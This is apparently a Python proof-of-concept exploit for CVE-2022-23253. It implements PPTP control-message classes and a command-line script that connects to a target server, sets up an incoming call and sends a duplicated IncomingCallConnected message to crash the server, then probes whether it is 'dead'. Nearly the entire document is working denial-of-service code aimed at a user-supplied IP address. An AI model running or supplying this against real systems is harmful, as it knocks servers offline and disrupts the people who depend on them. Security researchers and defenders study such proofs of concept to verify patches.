README.md
Rendering markdown...
import socket
import select
import secrets
import struct
import argparse
CTL_PORT = 1723
TEST_SERVER = ""
# CTL Message Types
gStartControlConnectionRequest = 1
gStartControlConnectionReply = 2
gIncomingCallRequest = 9
gIncomingCallReply = 10
gIncomingCallConnected = 11
# Framing Capabillities
gAsynchronousFraming = 0x1
gSynchronousFraming = 0x2
# Bearer Capabillities
gAnalogAccessSupported = 0x1
gDigitalAccessSupported = 0x2
class CtlClient():
def __init__(self, serverIp, serverPort=CTL_PORT):
self.IP = serverIp
self.Port = serverPort
self.Socket = None
self.IsConnected = False
def CtlCloseConn(self):
self.Socket.close()
def CtlSendMsg(self, CtlMessage, multiplier=1):
if not self.IsConnected:
raise RuntimeError("Attempted to send Ctl data on unconnected client")
ctlmsgbuf: bytes = CtlMessage.build() * multiplier
self.Socket.send(ctlmsgbuf)
def CtlMultiSendMsg(self, CtlMessageArray):
if not self.IsConnected:
raise RuntimeError("Attempted to send Ctl data on unconnected client")
sendBuffer = b""
for CtlMsg in CtlMessageArray:
sendBuffer += CtlMsg.build()
self.Socket.send(sendBuffer)
def CtlRecvMsg(self):
chunks = []
ready = select.select([self.Socket], [], [], 1)
if ready[0]:
chunk = self.Socket.recv(1024)
chunks.append(chunk)
while(len(chunk) == 1024):
chunk = self.Socket.recv(1024)
chunks.append(chunk)
return b"".join(chunks)
def CtlConnect(self, timeout=None):
#Connect to the Ctl server
self.Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if timeout:
self.Socket.settimeout(timeout)
self.Socket.connect((self.IP, self.Port))
self.IsConnected = True
class ControlMessage():
SIZE = 0xC # 12 byte header
def __init__(self, messageType, messageLength, setSize=False, packetBytes=None):
if packetBytes:
self.MessageLength = 0
self.PptpMessageType = 0
#Magic number
self.CtlMagic = 0
self.CtlMessageType = 0
self.Reserved0 = 0
self.SetSize = 0
self.__fromBytes(packetBytes)
else:
self.MessageLength = messageLength
self.PptpMessageType = 0x1
#Magic number
self.CtlMagic = 0x1A2B3C4D
self.CtlMessageType = messageType
self.Reserved0 = 0
self.SetSize = setSize
def build(self):
buffer = b""
if self.SetSize:
# Use the preconfigured set size for this packet
self.MessageLength = self.__SIZE
buffer += struct.pack(">H", self.MessageLength)
buffer += struct.pack(">H", self.PptpMessageType)
buffer += struct.pack(">I", self.CtlMagic)
buffer += struct.pack(">H", self.CtlMessageType)
buffer += struct.pack(">H", self.Reserved0)
return buffer
def __fromBytes(self, bytebuffer):
header = struct.unpack_from(">HHIHH", bytebuffer, 0)
self.MessageLength = header[0]
self.PptpMessageType = header[1]
self.CtlMagic = header[2]
self.CtlMessageType = header[3]
self.Reserved0 = header[4]
class StartControlConnectionRequest(ControlMessage):
SIZE = 0x90
def __init__(self, framing=gAsynchronousFraming, bearer=gAnalogAccessSupported, maxChannels=0x0, firmwareRevision=0x0, hostName=b"A" * 64, vendorString=b"B" * 64):
super().__init__(gStartControlConnectionRequest, ControlMessage.SIZE + StartControlConnectionRequest.SIZE)
self.protocolVersion = 0x100
self.Reserved1 = 0
self.FramingCapabilities = framing
self.BearerCapabilities = bearer
self.MaxChannels = maxChannels
self.FirmwareRevision = firmwareRevision
self.HostName = hostName # 64 byte host name string
self.VendorString = vendorString # 64 byte vendor string
def build(self):
buffer = b""
header = super().build()
buffer += struct.pack(">H", self.protocolVersion)
buffer += struct.pack(">H", self.Reserved1)
buffer += struct.pack(">I", self.FramingCapabilities)
buffer += struct.pack(">I", self.BearerCapabilities)
buffer += struct.pack(">H", self.MaxChannels)
buffer += struct.pack(">H", self.FirmwareRevision)
buffer += self.HostName
buffer += self.VendorString
return header + buffer
class StartControlConnectionReply(ControlMessage):
SIZE = 0x90
def __init__(self, framing=gAsynchronousFraming, bearer=gAnalogAccessSupported, maxChannels=0x0, firmwareRevision=0x0, hostName=b"A" * 64, vendorString=b"B" * 64, resultCode=0, errorCode=0, packetBytes=None):
super().__init__(gStartControlConnectionReply, ControlMessage.SIZE + StartControlConnectionRequest.SIZE, packetBytes=packetBytes)
if packetBytes:
self.protocolVersion = 0
self.ResultCode = 0
self.ErrorCode = 0
self.FramingCapabilities = 0
self.BearerCapabilities = 0
self.MaxChannels = 0
self.FirmwareRevision = 0
self.HostName = 0 # 64 byte host name string
self.VendorString = 0 # 64 byte vendor string
self.__fromBytes(packetBytes)
else:
self.protocolVersion = 0x100
self.ResultCode = resultCode
self.ErrorCode = errorCode
self.FramingCapabilities = framing
self.BearerCapabilities = bearer
self.MaxChannels = maxChannels
self.FirmwareRevision = firmwareRevision
self.HostName = hostName # 64 byte host name string
self.VendorString = vendorString # 64 byte vendor string
def build(self):
buffer = b""
header = super().build()
buffer += struct.pack(">H", self.protocolVersion)
buffer += struct.pack(">B", self.ResultCode)
buffer += struct.pack(">B", self.ErrorCode)
buffer += struct.pack(">I", self.FramingCapabilities)
buffer += struct.pack(">I", self.BearerCapabilities)
buffer += struct.pack(">H", self.MaxChannels)
buffer += struct.pack(">H", self.FirmwareRevision)
buffer += self.HostName
buffer += self.VendorString
return header + buffer
def __fromBytes(self, bytebuffer):
items = struct.unpack_from(">HBBIIHH", bytebuffer, ControlMessage.SIZE)
self.protocolVersion = items[0]
self.ResultCode = items[1]
self.ErrorCode = items[2]
self.FramingCapabilities = items[3]
self.BearerCapabilities = items[4]
self.MaxChannels = items[5]
self.FirmwareRevision = items[6]
class IncomingCallRequest(ControlMessage):
SIZE = 0xD0
def __init__(self,CallId=1337, CallSerialNumber=1338, CallBearerType=gAnalogAccessSupported, PhysicalChannelId=0, DialedNumberLength=64, DialingNumberLength=64,DialedNumber=64 *b"A", DialingNumber = 64 * b"B", Subaddress= 64 * b"C", packetBytes=None):
super().__init__(gIncomingCallRequest, IncomingCallRequest.SIZE + ControlMessage.SIZE, packetBytes=packetBytes)
self.CallId = CallId
self.CallSerialNumber = CallSerialNumber
self.CallBearerType = CallBearerType
self.PhysicalChannelId = PhysicalChannelId
self.DialedNumberLength = DialedNumberLength
self.DialingNumberLength = DialingNumberLength
self.DialedNumber = DialedNumber
self.DialingNumber = DialingNumber
self.Subaddress = Subaddress
def build(self):
buffer = b""
header = super().build()
buffer += struct.pack(">H", self.CallId)
buffer += struct.pack(">H", self.CallSerialNumber)
buffer += struct.pack(">I", self.CallBearerType)
buffer += struct.pack(">I", self.PhysicalChannelId)
buffer += struct.pack(">H", self.DialedNumberLength)
buffer += struct.pack(">H", self.DialingNumberLength)
buffer += self.DialedNumber
buffer += self.DialingNumber
buffer += self.Subaddress
return header + buffer
class IncomingCallReply(ControlMessage):
SIZE = 0xC
def __init__(self,CallId=0x1337, PeersCallId=0x1338, ResultCode=1, ErrorCode=0, PacketRecvWindowSize=64, PacketTransitDelay=32, packetBytes=None):
super().__init__(gIncomingCallReply, IncomingCallReply.SIZE + ControlMessage.SIZE, packetBytes=packetBytes)
if packetBytes:
self.CallId = 0
self.PeersCallId = 0
self.ResultCode = 0
self.ErrorCode = 0
self.PacketRecvWindowSize = 0,
self.PacketTransitDelay = 0
self.Reserved1 = 0
self.fromBytes(packetBytes)
else:
self.CallId = CallId
self.PeersCallId = PeersCallId
self.ResultCode = ResultCode
self.ErrorCode = ErrorCode
self.PacketRecvWindowSize = PacketRecvWindowSize,
self.PacketTransitDelay = PacketTransitDelay
self.Reserved1 = 0
def build(self):
buffer = b""
header = super().build()
buffer += struct.pack(">H", self.CallId)
buffer += struct.pack(">H", self.PeersCallId)
buffer += struct.pack(">B", self.ResultCode)
buffer += struct.pack(">B", self.ErrorCode)
buffer += struct.pack(">H", self.PacketRecvWindowSize)
buffer += struct.pack(">H", self.PacketTransitDelay)
buffer += struct.pack(">H", self.Reserved1)
return header + buffer
def fromBytes(self, bytebuffer):
items = struct.unpack_from(">HHBBHHH", bytebuffer, ControlMessage.SIZE)
self.CallId = items[0]
self.PeersCallId = items[1]
self.ResultCode = items[2]
self.ErrorCode = items[3]
self.PacketRecvWindowSize = items[4]
self.PacketTransitDelay = items[5]
self.Reserved1 = items[6]
class IncomingCallConnected(ControlMessage):
SIZE = 0x10
def __init__(self,PeerCallId=1337, ConnectSpeed=1, PacketRecvWindowsSize=64, PacketTransmitDelay=0, FramingType = gAsynchronousFraming, packetBytes=None):
super().__init__(gIncomingCallConnected, IncomingCallConnected.SIZE + ControlMessage.SIZE, packetBytes=packetBytes)
if packetBytes:
pass
else:
self.PeerCallId = PeerCallId
self.Reserved1 = 0
self.ConnectSpeed = ConnectSpeed
self.PacketRecvWindowSize = PacketRecvWindowsSize
self.PacketTransmitDelay = PacketTransmitDelay
self.FramingType = FramingType
def build(self):
buffer = b""
header = super().build()
buffer += struct.pack(">H", self.PeerCallId)
buffer += struct.pack(">H", self.Reserved1)
buffer += struct.pack(">I", self.ConnectSpeed)
buffer += struct.pack(">H", self.PacketRecvWindowSize)
buffer += struct.pack(">H", self.PacketTransmitDelay)
buffer += struct.pack(">I", self.FramingType)
return header + buffer
def startControlSession():
pocClient = CtlClient(TEST_SERVER)
initializeCtlConnection = StartControlConnectionRequest()
pocClient.CtlConnect()
pocClient.CtlSendMsg(initializeCtlConnection)
StartControlReply_raw = pocClient.CtlRecvMsg()
initializeCtlResponse = StartControlConnectionReply(packetBytes=StartControlReply_raw)
if initializeCtlResponse.ErrorCode != 0 or initializeCtlResponse.ResultCode != 1:
raise ValueError("[:(] PoC Failed unexpectadly due to server side error, investigation reqiured....")
return pocClient
def poke_server():
try:
print("[+] Pokeing the target....")
poke_client = CtlClient(TEST_SERVER)
poke_client.CtlConnect(timeout=1)
print("[-] Its alive!?")
except Exception as e:
print("[+] Yep, its dead")
def trigger_cve_2022_23253():
print("[+] Starting PPTP control connection")
pocClient = startControlSession()
newCallId = secrets.randbelow(0x10000)
newCallSerial = secrets.randbelow(0x10000)
newIncomingCall = IncomingCallRequest(CallId=newCallId,CallSerialNumber=newCallSerial) #Requests Causing Issues
print("[+] Creating new incoming call")
pocClient.CtlSendMsg(newIncomingCall)
ICReply_raw = pocClient.CtlRecvMsg()
newIncomingCallReply = IncomingCallReply(packetBytes=ICReply_raw)
print("[+] Incoming call reply received with call ID {}".format(newIncomingCallReply.CallId))
if newIncomingCallReply.ResultCode != 1 or newIncomingCallReply.ErrorCode != 0:
raise ValueError("[:(] PoC failed unexpecadle due to server side error... ")
newIncomingCallConnected = IncomingCallConnected(newIncomingCallReply.CallId, 64, newIncomingCallReply.PacketRecvWindowSize, newIncomingCallReply.PacketTransitDelay)
print("[+] Triggering Bug!")
pocClient.CtlSendMsg(newIncomingCallConnected)
pocClient.CtlSendMsg(newIncomingCallConnected)
print("[+] Machine should be dead now, lets check!")
poke_server()
def main():
global TEST_SERVER
global CTL_PORT
parser = argparse.ArgumentParser(description="PoC for CVE-2022-23253!")
parser.add_argument('--ip', type=str,required=True,dest="ip_address",help="IP address of the target server")
parser.add_argument('--port', type=int, default=CTL_PORT,dest="ctl_port", help="Port of the PPTP CTL TCP socket, should remain as {} in most cases.".format(CTL_PORT))
args = parser.parse_args()
TEST_SERVER = args.ip_address
CTL_PORT = args.ctl_port
continue_to_trigger = input("[?] This PoC will crash a vulnerable server, do you want to continue [y/n]: ")
if continue_to_trigger.lower() == "y":
print("[+] Triggering Bug!")
trigger_cve_2022_23253()
else:
print("[+] GoodBye!")
if __name__ == '__main__':
main()